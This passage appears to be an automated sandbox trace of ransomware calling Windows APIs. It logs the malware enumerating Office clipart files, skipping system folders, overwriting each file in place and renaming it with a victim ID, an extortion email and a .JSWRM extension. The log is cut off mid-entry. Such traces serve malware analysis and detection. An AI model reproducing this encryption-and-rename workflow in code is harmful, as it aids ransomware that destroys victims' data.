[0085.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0085.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0085.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0085.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0085.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0085.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0085.780] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0085.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0085.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.781] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x54d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0157177.WMF", cAlternateFileName="")) returned 1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2=".") returned 1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="..") returned 1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="...") returned 1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="windows") returned -1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="recovery") returned -1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="perflogs") returned -1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="documents and settings") returned 1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="system volume information") returned -1 [0085.781] lstrcmpiW (lpString1="J0157177.WMF", lpString2="msocache") returned -1 [0085.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0085.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157177.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157177.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157177.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0085.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0085.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157177.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157177.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157177.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0085.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0085.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0085.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0085.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.782] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21716) returned 1 [0085.782] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x54d0) returned 0x24d210 [0085.783] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x54d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x54d0, lpOverlapped=0x0) returned 1 [0085.793] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.793] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x54d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x54d0, lpOverlapped=0x0) returned 1 [0085.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.793] CloseHandle (hObject=0x314) returned 1 [0085.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0085.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0085.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0085.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0085.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0085.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0085.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.794] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0085.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0085.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0085.795] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0157191.WMF", cAlternateFileName="")) returned 1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2=".") returned 1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="..") returned 1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="...") returned 1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="windows") returned -1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="recovery") returned -1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="perflogs") returned -1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="documents and settings") returned 1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="system volume information") returned -1 [0085.795] lstrcmpiW (lpString1="J0157191.WMF", lpString2="msocache") returned -1 [0085.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0085.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157191.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157191.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157191.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0085.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0085.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157191.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157191.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157191.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0085.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0085.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0085.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0085.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.796] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17912) returned 1 [0085.796] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x45f0) returned 0x24d210 [0085.796] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x45f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x45f0, lpOverlapped=0x0) returned 1 [0085.807] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.807] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x45f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x45f0, lpOverlapped=0x0) returned 1 [0085.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.807] CloseHandle (hObject=0x314) returned 1 [0085.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0085.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0085.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0085.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0085.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.808] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0085.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0085.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0085.808] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c84, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0157831.WMF", cAlternateFileName="")) returned 1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2=".") returned 1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2="..") returned 1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2="...") returned 1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2="windows") returned -1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2="recovery") returned -1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2="perflogs") returned -1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2="documents and settings") returned 1 [0085.808] lstrcmpiW (lpString1="J0157831.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.809] lstrcmpiW (lpString1="J0157831.WMF", lpString2="system volume information") returned -1 [0085.809] lstrcmpiW (lpString1="J0157831.WMF", lpString2="msocache") returned -1 [0085.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157831.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157831.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157831.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157831.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157831.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157831.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0085.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0085.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0085.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.810] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11396) returned 1 [0085.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c80) returned 0x24d210 [0085.810] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2c80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2c80, lpOverlapped=0x0) returned 1 [0085.812] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.812] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2c80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2c80, lpOverlapped=0x0) returned 1 [0085.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.813] CloseHandle (hObject=0x314) returned 1 [0085.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0085.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0085.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0085.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0085.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0085.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0085.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.813] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0085.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: 